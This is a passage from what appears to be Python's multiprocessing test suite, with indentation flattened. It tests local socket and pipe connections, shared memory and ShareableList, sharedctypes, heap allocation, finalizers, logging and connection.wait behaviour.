from multiprocessing import resource_sharer
resource_sharer.stop(timeout=TIMEOUT)
@classmethod
def _listener(cls, conn, families):
for fam in families:
l = cls.connection.Listener(family=fam)
conn.send(l.address)
new_conn = l.accept()
conn.send(new_conn)
new_conn.close()
l.close()
l = socket.create_server((test.support.HOST, 0))
conn.send(l.getsockname())
new_conn, addr = l.accept()
conn.send(new_conn)
new_conn.close()
l.close()
conn.recv()
@classmethod
def _remote(cls, conn):
for (address, msg) in iter(conn.recv, None):
client = cls.connection.Client(address)
client.send(msg.upper())
client.close()
address, msg = conn.recv()
client = socket.socket()
client.connect(address)
client.sendall(msg.upper())
client.close()
conn.close()
def test_pickling(self):
families = self.connection.families
lconn, lconn0 = self.Pipe()
lp = self.Process(target=self._listener, args=(lconn0, families))
lp.daemon = True
lp.start()
lconn0.close()
rconn, rconn0 = self.Pipe()
rp = self.Process(target=self._remote, args=(rconn0,))
rp.daemon = True
rp.start()
rconn0.close()
for fam in families:
msg = ('This connection uses family %s' % fam).encode('ascii')
address = lconn.recv()
rconn.send((address, msg))
new_conn = lconn.recv()
self.assertEqual(new_conn.recv(), msg.upper())
rconn.send(None)
msg = latin('This connection uses a normal socket')
address = lconn.recv()
rconn.send((address, msg))
new_conn = lconn.recv()
buf = []
while True:
s = new_conn.recv(100)
if not s:
break
buf.append(s)
buf = b''.join(buf)
self.assertEqual(buf, msg.upper())
new_conn.close()
lconn.send(None)
rconn.close()
lconn.close()
lp.join()
rp.join()
@classmethod
def child_access(cls, conn):
w = conn.recv()
w.send('all is well')
w.close()
r = conn.recv()
msg = r.recv()
conn.send(msg*2)
conn.close()
def test_access(self):
# On Windows, if we do not specify a destination pid when
# using DupHandle then we need to be careful to use the
# correct access flags for DuplicateHandle(), or else
# DupHandle.detach() will raise PermissionError. For example,
# for a read only pipe handle we should use
# access=FILE_GENERIC_READ. (Unfortunately
# DUPLICATE_SAME_ACCESS does not work.)
conn, child_conn = self.Pipe()
p = self.Process(target=self.child_access, args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
r, w = self.Pipe(duplex=False)
conn.send(w)
w.close()
self.assertEqual(r.recv(), 'all is well')
r.close()
r, w = self.Pipe(duplex=False)
conn.send(r)
r.close()
w.send('foobar')
w.close()
self.assertEqual(conn.recv(), 'foobar'*2)
p.join()
#
#
#
class _TestHeap(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
super().setUp()
# Make pristine heap for these tests
self.old_heap = multiprocessing.heap.BufferWrapper._heap
multiprocessing.heap.BufferWrapper._heap = multiprocessing.heap.Heap()
def tearDown(self):
multiprocessing.heap.BufferWrapper._heap = self.old_heap
super().tearDown()
def test_heap(self):
iterations = 5000
maxblocks = 50
blocks = []
# get the heap object
heap = multiprocessing.heap.BufferWrapper._heap
heap._DISCARD_FREE_SPACE_LARGER_THAN = 0
# create and destroy lots of blocks of different sizes
for i in range(iterations):
size = int(random.lognormvariate(0, 1) * 1000)
b = multiprocessing.heap.BufferWrapper(size)
blocks.append(b)
if len(blocks) > maxblocks:
i = random.randrange(maxblocks)
del blocks[i]
del b
# verify the state of the heap
with heap._lock:
all = []
free = 0
occupied = 0
for L in list(heap._len_to_seq.values()):
# count all free blocks in arenas
for arena, start, stop in L:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'free'))
free += (stop-start)
for arena, arena_blocks in heap._allocated_blocks.items():
# count all allocated blocks in arenas
for start, stop in arena_blocks:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'occupied'))
occupied += (stop-start)
self.assertEqual(free + occupied,
sum(arena.size for arena in heap._arenas))
all.sort()
for i in range(len(all)-1):
(arena, start, stop) = all[i][:3]
(narena, nstart, nstop) = all[i+1][:3]
if arena != narena:
# Two different arenas
self.assertEqual(stop, heap._arenas[arena].size) # last block
self.assertEqual(nstart, 0) # first block
else:
# Same arena: two adjacent blocks
self.assertEqual(stop, nstart)
# test freeing all blocks
random.shuffle(blocks)
while blocks:
blocks.pop()
self.assertEqual(heap._n_frees, heap._n_mallocs)
self.assertEqual(len(heap._pending_free_blocks), 0)
self.assertEqual(len(heap._arenas), 0)
self.assertEqual(len(heap._allocated_blocks), 0, heap._allocated_blocks)
self.assertEqual(len(heap._len_to_seq), 0)
def test_free_from_gc(self):
# Check that freeing of blocks by the garbage collector doesn't deadlock
# (issue #12352).
# Make sure the GC is enabled, and set lower collection thresholds to
# make collections more frequent (and increase the probability of
# deadlock).
if not gc.isenabled():
gc.enable()
self.addCleanup(gc.disable)
thresholds = gc.get_threshold()
self.addCleanup(gc.set_threshold, *thresholds)
gc.set_threshold(10)
# perform numerous block allocations, with cyclic references to make
# sure objects are collected asynchronously by the gc
for i in range(5000):
a = multiprocessing.heap.BufferWrapper(1)
b = multiprocessing.heap.BufferWrapper(1)
# circular references
a.buddy = b
b.buddy = a
#
#
#
class _Foo(Structure):
_fields_ = [
('x', c_int),
('y', c_double),
('z', c_longlong,)
]
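# Simple ctypes Structure shared with a child process in the sharedctypes
# tests below.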
class _TestSharedCTypes(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
if not HAS_SHAREDCTYPES:
self.skipTest("requires multiprocessing.sharedctypes")
@classmethod
def _double(cls, x, y, z, foo, arr, string):
x.value *= 2
y.value *= 2
z.value *= 2
foo.x *= 2
foo.y *= 2
string.value *= 2
for i in range(len(arr)):
arr[i] *= 2
def test_sharedctypes(self, lock=False):
x = Value('i', 7, lock=lock)
y = Value(c_double, 1.0/3.0, lock=lock)
z = Value(c_longlong, 2 ** 33, lock=lock)
foo = Value(_Foo, 3, 2, lock=lock)
arr = self.Array('d', list(range(10)), lock=lock)
string = self.Array('c', 20, lock=lock)
string.value = latin('hello')
p = self.Process(target=self._double, args=(x, y, z, foo, arr, string))
p.daemon = True
p.start()
p.join()
self.assertEqual(x.value, 14)
self.assertAlmostEqual(y.value, 2.0/3.0)
self.assertEqual(z.value, 2 ** 34)
self.assertEqual(foo.x, 6)
self.assertAlmostEqual(foo.y, 4.0)
for i in range(10):
self.assertAlmostEqual(arr[i], i*2)
self.assertEqual(string.value, latin('hellohello'))
def test_synchronize(self):
self.test_sharedctypes(lock=True)
def test_copy(self):
foo = _Foo(2, 5.0, 2 ** 33)
bar = copy(foo)
foo.x = 0
foo.y = 0
foo.z = 0
self.assertEqual(bar.x, 2)
self.assertAlmostEqual(bar.y, 5.0)
self.assertEqual(bar.z, 2 ** 33)
@unittest.skipUnless(HAS_SHMEM, "requires multiprocessing.shared_memory")
class _TestSharedMemory(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@staticmethod
def _attach_existing_shmem_then_write(shmem_name_or_obj, binary_data):
if isinstance(shmem_name_or_obj, str):
local_sms = shared_memory.SharedMemory(shmem_name_or_obj)
else:
local_sms = shmem_name_or_obj
local_sms.buf[:len(binary_data)] = binary_data
local_sms.close()
def test_shared_memory_basics(self):
sms = shared_memory.SharedMemory('test01_tsmb', create=True, size=512)
self.addCleanup(sms.unlink)
# Verify attributes are readable.
self.assertEqual(sms.name, 'test01_tsmb')
self.assertGreaterEqual(sms.size, 512)
self.assertGreaterEqual(len(sms.buf), sms.size)
# Modify contents of shared memory segment through memoryview.
sms.buf[0] = 42
self.assertEqual(sms.buf[0], 42)
# Attach to existing shared memory segment.
also_sms = shared_memory.SharedMemory('test01_tsmb')
self.assertEqual(also_sms.buf[0], 42)
also_sms.close()
# Attach to existing shared memory segment but specify a new size.
same_sms = shared_memory.SharedMemory('test01_tsmb', size=20*sms.size)
self.assertLess(same_sms.size, 20*sms.size) # Size was ignored.
same_sms.close()
# Creating a shared memory segment with a negative size fails
with self.assertRaises(ValueError):
shared_memory.SharedMemory(create=True, size=-2)
# Attaching to a shared memory segment without supplying a name fails
with self.assertRaises(ValueError):
shared_memory.SharedMemory(create=False)
# Test that the shared memory segment is created properly when
# _make_filename returns an existing shared memory segment name
with unittest.mock.patch(
'multiprocessing.shared_memory._make_filename') as mock_make_filename:
NAME_PREFIX = shared_memory._SHM_NAME_PREFIX
names = ['test01_fn', 'test02_fn']
# Prepend NAME_PREFIX, which can be '/psm_' or 'wnsm_'; this is necessary
# because some POSIX-compliant systems require the name to start with /
names = [NAME_PREFIX + name for name in names]
mock_make_filename.side_effect = names
shm1 = shared_memory.SharedMemory(create=True, size=1)
self.addCleanup(shm1.unlink)
self.assertEqual(shm1._name, names[0])
mock_make_filename.side_effect = names
shm2 = shared_memory.SharedMemory(create=True, size=1)
self.addCleanup(shm2.unlink)
self.assertEqual(shm2._name, names[1])
if shared_memory._USE_POSIX:
# Posix Shared Memory can only be unlinked once. Here we
# test an implementation detail that is not observed across
# all supported platforms (since WindowsNamedSharedMemory
# manages unlinking on its own and unlink() does nothing).
# True release of shared memory segment does not necessarily
# happen until process exits, depending on the OS platform.
with self.assertRaises(FileNotFoundError):
sms_uno = shared_memory.SharedMemory(
'test01_dblunlink',
create=True,
size=5000
)
try:
self.assertGreaterEqual(sms_uno.size, 5000)
sms_duo = shared_memory.SharedMemory('test01_dblunlink')
sms_duo.unlink() # First shm_unlink() call.
sms_duo.close()
sms_uno.close()
finally:
sms_uno.unlink() # A second shm_unlink() call is bad.
with self.assertRaises(FileExistsError):
# Attempting to create a new shared memory segment with a
# name that is already in use triggers an exception.
there_can_only_be_one_sms = shared_memory.SharedMemory(
'test01_tsmb',
create=True,
size=512
)
if shared_memory._USE_POSIX:
# Requesting creation of a shared memory segment with the option
# to attach to an existing segment, if that name is currently in
# use, should not trigger an exception.
# Note: Using a smaller size could possibly cause truncation of
# the existing segment but is OS platform dependent. In the
# case of MacOS/darwin, requesting a smaller size is disallowed.
class OptionalAttachSharedMemory(shared_memory.SharedMemory):
_flags = os.O_CREAT | os.O_RDWR
ok_if_exists_sms = OptionalAttachSharedMemory('test01_tsmb')
self.assertEqual(ok_if_exists_sms.size, sms.size)
ok_if_exists_sms.close()
# Attempting to attach to an existing shared memory segment when
# no segment exists with the supplied name triggers an exception.
with self.assertRaises(FileNotFoundError):
nonexisting_sms = shared_memory.SharedMemory('test01_notthere')
nonexisting_sms.unlink() # Error should occur on prior line.
sms.close()
def test_shared_memory_across_processes(self):
sms = shared_memory.SharedMemory('test02_tsmap', True, size=512)
self.addCleanup(sms.unlink)
# Verify remote attachment to existing block by name is working.
p = self.Process(
target=self._attach_existing_shmem_then_write,
args=(sms.name, b'howdy')
)
p.daemon = True
p.start()
p.join()
self.assertEqual(bytes(sms.buf[:5]), b'howdy')
# Verify pickling of SharedMemory instance also works.
p = self.Process(
target=self._attach_existing_shmem_then_write,
args=(sms, b'HELLO')
)
p.daemon = True
p.start()
p.join()
self.assertEqual(bytes(sms.buf[:5]), b'HELLO')
sms.close()
@unittest.skipIf(os.name != "posix", "not feasible in non-posix platforms")
def test_shared_memory_SharedMemoryServer_ignores_sigint(self):
# bpo-36368: protect SharedMemoryManager server process from
# KeyboardInterrupt signals.
smm = multiprocessing.managers.SharedMemoryManager()
smm.start()
# make sure the manager works properly at the beginning
sl = smm.ShareableList(range(10))
# the manager's server should ignore KeyboardInterrupt signals, and
# maintain its connection with the current process, and still succeed
# when asked to deliver memory segments.
os.kill(smm._process.pid, signal.SIGINT)
sl2 = smm.ShareableList(range(10))
# test that the custom signal handler registered in the Manager does
# not affect signal handling in the parent process.
with self.assertRaises(KeyboardInterrupt):
os.kill(os.getpid(), signal.SIGINT)
smm.shutdown()
@unittest.skipIf(os.name != "posix", "resource_tracker is posix only")
def test_shared_memory_SharedMemoryManager_reuses_resource_tracker(self):
# bpo-36867: test that a SharedMemoryManager uses the
# same resource_tracker process as its parent.
cmd = '''if 1:
from multiprocessing.managers import SharedMemoryManager
smm = SharedMemoryManager()
smm.start()
sl = smm.ShareableList(range(10))
smm.shutdown()
'''
rc, out, err = test.support.script_helper.assert_python_ok('-c', cmd)
# Before bpo-36867 was fixed, a SharedMemoryManager not using the same
# resource_tracker process as its parent would make the parent's
# tracker complain about sl being leaked even though smm.shutdown()
# properly released sl.
self.assertFalse(err)
def test_shared_memory_SharedMemoryManager_basics(self):
smm1 = multiprocessing.managers.SharedMemoryManager()
with self.assertRaises(ValueError):
smm1.SharedMemory(size=9) # Fails if SharedMemoryServer not started
smm1.start()
lol = [ smm1.ShareableList(range(i)) for i in range(5, 10) ]
lom = [ smm1.SharedMemory(size=j) for j in range(32, 128, 16) ]
doppleganger_list0 = shared_memory.ShareableList(name=lol[0].shm.name)
self.assertEqual(len(doppleganger_list0), 5)
doppleganger_shm0 = shared_memory.SharedMemory(name=lom[0].name)
self.assertGreaterEqual(len(doppleganger_shm0.buf), 32)
held_name = lom[0].name
smm1.shutdown()
if sys.platform != "win32":
# Calls to unlink() have no effect on the Windows platform; shared
# memory will only be released once the final process exits.
with self.assertRaises(FileNotFoundError):
# No longer there to be attached to again.
absent_shm = shared_memory.SharedMemory(name=held_name)
with multiprocessing.managers.SharedMemoryManager() as smm2:
sl = smm2.ShareableList("howdy")
shm = smm2.SharedMemory(size=128)
held_name = sl.shm.name
if sys.platform != "win32":
with self.assertRaises(FileNotFoundError):
# No longer there to be attached to again.
absent_sl = shared_memory.ShareableList(name=held_name)
def test_shared_memory_ShareableList_basics(self):
sl = shared_memory.ShareableList(
['howdy', b'HoWdY', -273.154, 100, None, True, 42]
)
self.addCleanup(sl.shm.unlink)
# Verify attributes are readable.
self.assertEqual(sl.format, '8s8sdqxxxxxx?xxxxxxxx?q')
# Exercise len().
self.assertEqual(len(sl), 7)
# Exercise index().
with warnings.catch_warnings():
# Suppress BytesWarning when comparing against b'HoWdY'.
warnings.simplefilter('ignore')
with self.assertRaises(ValueError):
sl.index('100')
self.assertEqual(sl.index(100), 3)
# Exercise retrieving individual values.
self.assertEqual(sl[0], 'howdy')
self.assertEqual(sl[-2], True)
# Exercise iterability.
self.assertEqual(
tuple(sl),
('howdy', b'HoWdY', -273.154, 100, None, True, 42)
)
# Exercise modifying individual values.
sl[3] = 42
self.assertEqual(sl[3], 42)
sl[4] = 'some' # Change type at a given position.
self.assertEqual(sl[4], 'some')
self.assertEqual(sl.format, '8s8sdq8sxxxxxxx?q')
with self.assertRaises(ValueError):
sl[4] = 'far too many' # Exceeds available storage.
self.assertEqual(sl[4], 'some')
# Exercise count().
with warnings.catch_warnings():
# Suppress BytesWarning when comparing against b'HoWdY'.
warnings.simplefilter('ignore')
self.assertEqual(sl.count(42), 2)
self.assertEqual(sl.count(b'HoWdY'), 1)
self.assertEqual(sl.count(b'adios'), 0)
# Exercise creating a duplicate.
sl_copy = shared_memory.ShareableList(sl, name='test03_duplicate')
try:
self.assertNotEqual(sl.shm.name, sl_copy.shm.name)
self.assertEqual('test03_duplicate', sl_copy.shm.name)
self.assertEqual(list(sl), list(sl_copy))
self.assertEqual(sl.format, sl_copy.format)
sl_copy[-1] = 77
self.assertEqual(sl_copy[-1], 77)
self.assertNotEqual(sl[-1], 77)
sl_copy.shm.close()
finally:
sl_copy.shm.unlink()
# Obtain a second handle on the same ShareableList.
sl_tethered = shared_memory.ShareableList(name=sl.shm.name)
self.assertEqual(sl.shm.name, sl_tethered.shm.name)
sl_tethered[-1] = 880
self.assertEqual(sl[-1], 880)
sl_tethered.shm.close()
sl.shm.close()
# Exercise creating an empty ShareableList.
empty_sl = shared_memory.ShareableList()
try:
self.assertEqual(len(empty_sl), 0)
self.assertEqual(empty_sl.format, '')
self.assertEqual(empty_sl.count('any'), 0)
with self.assertRaises(ValueError):
empty_sl.index(None)
empty_sl.shm.close()
finally:
empty_sl.shm.unlink()
def test_shared_memory_ShareableList_pickling(self):
sl = shared_memory.ShareableList(range(10))
self.addCleanup(sl.shm.unlink)
serialized_sl = pickle.dumps(sl)
deserialized_sl = pickle.loads(serialized_sl)
self.assertTrue(
isinstance(deserialized_sl, shared_memory.ShareableList)
)
self.assertEqual(deserialized_sl[-1], 9)
self.assertFalse(sl is deserialized_sl)
deserialized_sl[4] = "changed"
self.assertEqual(sl[4], "changed")
# Verify data is not being put into the pickled representation.
name = 'a' * len(sl.shm.name)
larger_sl = shared_memory.ShareableList(range(400))
self.addCleanup(larger_sl.shm.unlink)
serialized_larger_sl = pickle.dumps(larger_sl)
self.assertEqual(len(serialized_sl), len(serialized_larger_sl))
larger_sl.shm.close()
deserialized_sl.shm.close()
sl.shm.close()
def test_shared_memory_cleaned_after_process_termination(self):
cmd = '''if 1:
import os, time, sys
from multiprocessing import shared_memory
# Create a shared_memory segment, and send the segment name
sm = shared_memory.SharedMemory(create=True, size=10)
sys.stdout.write(sm.name + '\\n')
sys.stdout.flush()
time.sleep(100)
'''
with subprocess.Popen([sys.executable, '-E', '-c', cmd],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as p:
name = p.stdout.readline().strip().decode()
# Abruptly killing a process that holds a reference to a shared memory
# segment should not leak that segment.
p.terminate()
p.wait()
deadline = time.monotonic() + 60
t = 0.1
while time.monotonic() < deadline:
time.sleep(t)
t = min(t*2, 5)
try:
smm = shared_memory.SharedMemory(name, create=False)
except FileNotFoundError:
break
else:
raise AssertionError("A SharedMemory segment was leaked after"
" a process was abruptly terminated.")
if os.name == 'posix':
# A warning was emitted by the subprocess' own
# resource_tracker (on Windows, shared memory segments
# are released automatically by the OS).
err = p.stderr.read().decode()
self.assertIn(
"resource_tracker: There appear to be 1 leaked "
"shared_memory objects to clean up at shutdown", err)
#
#
#
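# These tests snapshot util._finalizer_registry in setUp() and restore it in
# tearDown() so they run against a clean registry.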
class _TestFinalize(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
self.registry_backup = util._finalizer_registry.copy()
util._finalizer_registry.clear()
def tearDown(self):
self.assertFalse(util._finalizer_registry)
util._finalizer_registry.update(self.registry_backup)
@classmethod
def _test_finalize(cls, conn):
class Foo(object):
pass
a = Foo()
util.Finalize(a, conn.send, args=('a',))
del a # triggers callback for a
b = Foo()
close_b = util.Finalize(b, conn.send, args=('b',))
close_b() # triggers callback for b
close_b() # does nothing because callback has already been called
del b # does nothing because callback has already been called
c = Foo()
util.Finalize(c, conn.send, args=('c',))
d10 = Foo()
util.Finalize(d10, conn.send, args=('d10',), exitpriority=1)
d01 = Foo()
util.Finalize(d01, conn.send, args=('d01',), exitpriority=0)
d02 = Foo()
util.Finalize(d02, conn.send, args=('d02',), exitpriority=0)
d03 = Foo()
util.Finalize(d03, conn.send, args=('d03',), exitpriority=0)
util.Finalize(None, conn.send, args=('e',), exitpriority=-10)
util.Finalize(None, conn.send, args=('STOP',), exitpriority=-100)
# call multiprocessing's cleanup function then exit process without
# garbage collecting locals
util._exit_function()
conn.close()
os._exit(0)
def test_finalize(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._test_finalize, args=(child_conn,))
p.daemon = True
p.start()
p.join()
result = [obj for obj in iter(conn.recv, 'STOP')]
self.assertEqual(result, ['a', 'b', 'd10', 'd03', 'd02', 'd01', 'e'])
def test_thread_safety(self):
# bpo-24484: _run_finalizers() should be thread-safe
def cb():
pass
class Foo(object):
def __init__(self):
self.ref = self # create reference cycle
# insert finalizer at random key
util.Finalize(self, cb, exitpriority=random.randint(1, 100))
finish = False
exc = None
def run_finalizers():
nonlocal exc
while not finish:
time.sleep(random.random() * 1e-1)
try:
# A GC run will eventually happen during this,
# collecting stale Foo's and mutating the registry
util._run_finalizers()
except Exception as e:
exc = e
def make_finalizers():
nonlocal exc
d = {}
while not finish:
try:
# Old Foo's get gradually replaced and later
# collected by the GC (because of the cyclic ref)
d[random.getrandbits(5)] = {Foo() for i in range(10)}
except Exception as e:
exc = e
d.clear()
old_interval = sys.getswitchinterval()
old_threshold = gc.get_threshold()
try:
sys.setswitchinterval(1e-6)
gc.set_threshold(5, 5, 5)
threads = [threading.Thread(target=run_finalizers),
threading.Thread(target=make_finalizers)]
with test.support.start_threads(threads):
time.sleep(4.0) # Wait a bit to trigger race condition
finish = True
if exc is not None:
raise exc
finally:
sys.setswitchinterval(old_interval)
gc.set_threshold(*old_threshold)
gc.collect() # Collect remaining Foo's
#
# Test that from ... import * works for each module
#
class _TestImportStar(unittest.TestCase):
def get_module_names(self):
import glob
folder = os.path.dirname(multiprocessing.__file__)
pattern = os.path.join(folder, '*.py')
files = glob.glob(pattern)
modules = [os.path.splitext(os.path.split(f)[1])[0] for f in files]
modules = ['multiprocessing.' + m for m in modules]
modules.remove('multiprocessing.__init__')
modules.append('multiprocessing')
return modules
def test_import(self):
modules = self.get_module_names()
if sys.platform == 'win32':
modules.remove('multiprocessing.popen_fork')
modules.remove('multiprocessing.popen_forkserver')
modules.remove('multiprocessing.popen_spawn_posix')
else:
modules.remove('multiprocessing.popen_spawn_win32')
if not HAS_REDUCTION:
modules.remove('multiprocessing.popen_forkserver')
if c_int is None:
# This module requires _ctypes
modules.remove('multiprocessing.sharedctypes')
for name in modules:
__import__(name)
mod = sys.modules[name]
self.assertTrue(hasattr(mod, '__all__'), name)
for attr in mod.__all__:
self.assertTrue(
hasattr(mod, attr),
'%r does not have attribute %r' % (mod, attr)
)
#
# Quick test that logging works -- does not test logging output
#
class _TestLogging(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_enable_logging(self):
logger = multiprocessing.get_logger()
logger.setLevel(util.SUBWARNING)
self.assertIsNotNone(logger)
logger.debug('this will not be printed')
logger.info('nor will this')
logger.setLevel(LOG_LEVEL)
@classmethod
def _test_level(cls, conn):
logger = multiprocessing.get_logger()
conn.send(logger.getEffectiveLevel())
def test_level(self):
LEVEL1 = 32
LEVEL2 = 37
logger = multiprocessing.get_logger()
root_logger = logging.getLogger()
root_level = root_logger.level
reader, writer = multiprocessing.Pipe(duplex=False)
logger.setLevel(LEVEL1)
p = self.Process(target=self._test_level, args=(writer,))
p.start()
self.assertEqual(LEVEL1, reader.recv())
p.join()
p.close()
logger.setLevel(logging.NOTSET)
root_logger.setLevel(LEVEL2)
p = self.Process(target=self._test_level, args=(writer,))
p.start()
self.assertEqual(LEVEL2, reader.recv())
p.join()
p.close()
root_logger.setLevel(root_level)
logger.setLevel(level=LOG_LEVEL)
# class _TestLoggingProcessName(BaseTestCase):
#
# def handle(self, record):
# assert record.processName == multiprocessing.current_process().name
# self.__handled = True
#
# def test_logging(self):
# handler = logging.Handler()
# handler.handle = self.handle
# self.__handled = False
# # Bypass getLogger() and side-effects
# logger = logging.getLoggerClass()(
# 'multiprocessing.test.TestLoggingProcessName')
# logger.addHandler(handler)
# logger.propagate = False
#
# logger.warn('foo')
# assert self.__handled
#
# Check that Process.join() retries if os.waitpid() fails with EINTR
#
class _TestPollEintr(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def _killer(cls, pid):
time.sleep(0.1)
os.kill(pid, signal.SIGUSR1)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_poll_eintr(self):
got_signal = [False]
def record(*args):
got_signal[0] = True
pid = os.getpid()
oldhandler = signal.signal(signal.SIGUSR1, record)
try:
killer = self.Process(target=self._killer, args=(pid,))
killer.start()
try:
p = self.Process(target=time.sleep, args=(2,))
p.start()
p.join()
finally:
killer.join()
self.assertTrue(got_signal[0])
self.assertEqual(p.exitcode, 0)
finally:
signal.signal(signal.SIGUSR1, oldhandler)
#
# Test to verify handle verification, see issue 3321
#
class TestInvalidHandle(unittest.TestCase):
@unittest.skipIf(WIN32, "skipped on Windows")
def test_invalid_handles(self):
conn = multiprocessing.connection.Connection(44977608)
# check that poll() doesn't crash
try:
conn.poll()
except (ValueError, OSError):
pass
finally:
# Hack private attribute _handle to avoid printing an error
# in conn.__del__
conn._handle = None
self.assertRaises((ValueError, OSError),
multiprocessing.connection.Connection, -1)
class OtherTest(unittest.TestCase):
# TODO: add more tests for deliver/answer challenge.
def test_deliver_challenge_auth_failure(self):
class _FakeConnection(object):
def recv_bytes(self, size):
return b'something bogus'
def send_bytes(self, data):
pass
self.assertRaises(multiprocessing.AuthenticationError,
multiprocessing.connection.deliver_challenge,
_FakeConnection(), b'abc')
def test_answer_challenge_auth_failure(self):
class _FakeConnection(object):
def __init__(self):
self.count = 0
def recv_bytes(self, size):
self.count += 1
if self.count == 1:
return multiprocessing.connection.CHALLENGE
elif self.count == 2:
return b'something bogus'
return b''
def send_bytes(self, data):
pass
self.assertRaises(multiprocessing.AuthenticationError,
multiprocessing.connection.answer_challenge,
_FakeConnection(), b'abc')
#
# Test Manager.start()/Pool.__init__() initializer feature - see issue 5585
#
def initializer(ns):
ns.test += 1
class TestInitializers(unittest.TestCase):
def setUp(self):
self.mgr = multiprocessing.Manager()
self.ns = self.mgr.Namespace()
self.ns.test = 0
def tearDown(self):
self.mgr.shutdown()
self.mgr.join()
def test_manager_initializer(self):
m = multiprocessing.managers.SyncManager()
self.assertRaises(TypeError, m.start, 1)
m.start(initializer, (self.ns,))
self.assertEqual(self.ns.test, 1)
m.shutdown()
m.join()
def test_pool_initializer(self):
self.assertRaises(TypeError, multiprocessing.Pool, initializer=1)
p = multiprocessing.Pool(1, initializer, (self.ns,))
p.close()
p.join()
self.assertEqual(self.ns.test, 1)
#
# Issue 5155, 5313, 5331: Test process in processes
# Verifies os.close(sys.stdin.fileno()) vs. sys.stdin.close() behavior
#
def _this_sub_process(q):
try:
item = q.get(block=False)
except pyqueue.Empty:
pass
def _test_process():
queue = multiprocessing.Queue()
subProc = multiprocessing.Process(target=_this_sub_process, args=(queue,))
subProc.daemon = True
subProc.start()
subProc.join()
def _afunc(x):
return x*x
def pool_in_process():
pool = multiprocessing.Pool(processes=4)
x = pool.map(_afunc, [1, 2, 3, 4, 5, 6, 7])
pool.close()
pool.join()
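# File-like stand-in whose write() buffers data per-process (keyed by
# os.getpid()) and whose flush() forwards the buffered data to the wrapped
# stream; used by TestStdinBadfiledescriptor.test_flushing() below.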
class _file_like(object):
def __init__(self, delegate):
self._delegate = delegate
self._pid = None
@property
def cache(self):
pid = os.getpid()
# No race condition here: after fork() only the calling thread survives in the child
if pid != self._pid:
self._pid = pid
self._cache = []
return self._cache
def write(self, data):
self.cache.append(data)
def flush(self):
self._delegate.write(''.join(self.cache))
self._cache = []
class TestStdinBadfiledescriptor(unittest.TestCase):
def test_queue_in_process(self):
proc = multiprocessing.Process(target=_test_process)
proc.start()
proc.join()
def test_pool_in_process(self):
p = multiprocessing.Process(target=pool_in_process)
p.start()
p.join()
def test_flushing(self):
sio = io.StringIO()
flike = _file_like(sio)
flike.write('foo')
proc = multiprocessing.Process(target=lambda: flike.flush())
flike.flush()
assert sio.getvalue() == 'foo'
class TestWait(unittest.TestCase):
@classmethod
def _child_test_wait(cls, w, slow):
for i in range(10):
if slow:
time.sleep(random.random()*0.1)
w.send((i, os.getpid()))
w.close()
def test_wait(self, slow=False):
from multiprocessing.connection import wait
readers = []
procs = []
messages = []
for i in range(4):
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=self._child_test_wait, args=(w, slow))
p.daemon = True
p.start()
w.close()
readers.append(r)
procs.append(p)
self.addCleanup(p.join)
while readers:
for r in wait(readers):
try:
msg = r.recv()
except EOFError:
readers.remove(r)
r.close()
else:
messages.append(msg)
messages.sort()
expected = sorted((i, p.pid) for i in range(10) for p in procs)
self.assertEqual(messages, expected)
@classmethod
def _child_test_wait_socket(cls, address, slow):
s = socket.socket()
s.connect(address)
for i in range(10):
if slow:
time.sleep(random.random()*0.1)
s.sendall(('%s\n' % i).encode('ascii'))
s.close()
def test_wait_socket(self, slow=False):
from multiprocessing.connection import wait
l = socket.create_server((test.support.HOST, 0))
addr = l.getsockname()
readers = []
procs = []
dic = {}
for i in range(4):
p = multiprocessing.Process(target=self._child_test_wait_socket,
args=(addr, slow))
p.daemon = True
p.start()
procs.append(p)
self.addCleanup(p.join)
for i in range(4):
r, _ = l.accept()
readers.append(r)
dic[r] = []
l.close()
while readers:
for r in wait(readers):
msg = r.recv(32)
if not msg:
readers.remove(r)
r.close()
else:
dic[r].append(msg)
expected = ''.join('%s\n' % i for i in range(10)).encode('ascii')
for v in dic.values():
self.assertEqual(b''.join(v), expected)
def test_wait_slow(self):
self.test_wait(True)
def test_wait_socket_slow(self):
self.test_wait_socket(True)
def test_wait_timeout(self):
from multiprocessing.connection import wait
expected = 5
a, b = multiprocessing.Pipe()
start = time.monotonic()
res = wait([a, b], expected)
delta = time.monotonic() - start
self.assertEqual(res, [])
self.assertLess(delta, expected * 2)
self.assertGreater(delta, expected * 0.5)
b.send(None)
start = time.monotonic()
res = wait([a, b], 20)
delta = time.monotonic() - start
self.assertEqual(res, [a])
self.assertLess(delta, 0.4)
@classmethod
def signal_and_sleep(cls, sem, period):
sem.release()
time.sleep(period)
def test_wait_integer(self):
from multiprocessing.connection import wait
expected = 3
sorted_ = lambda l: sorted(l, key=lambda x: id(x))
sem = multiprocessing.Semaphore(0)
a, b = multiprocessing.Pipe()
p = multiprocessing.Process(target=self.signal_and_sleep,
args=(sem, expected))
p.start()
self.assertIsInstance(p.sentinel, int)
self.assertTrue(sem.acquire(timeout=20))
start = time.monotonic()
res = wait([a, p.sentinel, b], expected + 20)
delta = time.monotonic() - start
self.assertEqual(res, [p.sentinel])
self.assertLess(delta, expected + 2)
self.assertGreater(delta, expected - 2)
a.send(None)
start = time.monotonic()
res = wait([a, p.sentinel, b], 20)
delta = time.monotonic() - start
self.assertEqual(sorted_(res), sorted_([p.sentinel, b]))
self.assertLess(delta, 0.4)
b.send(None)
start = time.monotonic()
res = wait([a, p.sentinel, b], 20)
delta = time.monotonic() - start
self.assertEqual(sorted_(res), sorted_([a, p.sentinel, b]))
self.assertLess(delta, 0.4)
p.terminate()
p.join()
def test_neg_timeout(self):
from multiprocessing.connection import wait
a, b = multiprocessing.Pipe()
t = time.monotonic()
res = wait([a], timeout=-1)
t = time.monotonic() - t
self.assertEqual(res, [])
self.assertLess(t, 1)
